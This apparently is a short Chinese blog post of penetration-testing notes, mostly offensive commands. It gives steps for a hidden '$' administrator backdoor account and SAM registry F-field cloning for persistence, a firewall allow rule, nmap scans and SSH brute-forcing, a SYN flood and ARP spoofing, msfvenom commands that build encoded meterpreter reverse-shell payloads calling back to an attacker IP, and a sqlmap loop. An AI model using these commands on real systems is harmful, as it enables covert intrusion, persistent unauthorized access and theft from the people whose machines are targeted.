渗透随笔
1.维权
cmd
net user 用户名$ 密码 /add #$在cmd net user不显示但在控制面板账户管理里面显示
net localgroup administrators 用户名$ /add
netsh advfirewall firewall add rule name="程序名称" dir=in action=allow program="完整路径" enable=yes
regedit
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users的值分别与Account对应
将administrator用户对应的hex目录里F字段内容复制,同样的,找到新建隐藏用户指向的hex目录,将上一步复制来的内容替换掉此F字段内容
`参考自:https://blog.csdn.net/vanarrow/article/details/105605472
rpc 想不起来了
bash
nmap -sV <ip>
nmap -sS <ip>
nmap -TA <ip>
nmap --script dns-brute <target>
nmap -p 22 --script ssh-brute --script-args userdb=<user字典目录>,passdb=<passwd字典目录
nmap -sV --script vulners --script-args mincvss=5.0 <ip>
scapy synflood

arpspoof arpspoof -i eth0 -t target_ip gateway

netwox

metasploitable
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.68.135 lport=4444 -b '\x00' -i 1 -f python
msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp -i 3 -e x86/shikata_ga_nai -f exe -o payload.exe
search exploit/multi/handler
等。。。。。。
#!/bash/bin
url="url"
for i in {1..10};do sqlmap -u "${url}?id=$i" --dbs;done
渗透中的regedit转https://www.cnblogs.com/g0udan/p/14469424.html
| 2023-06-30 22:33 | header |
|---|---|

浙公网安备 33010602011771号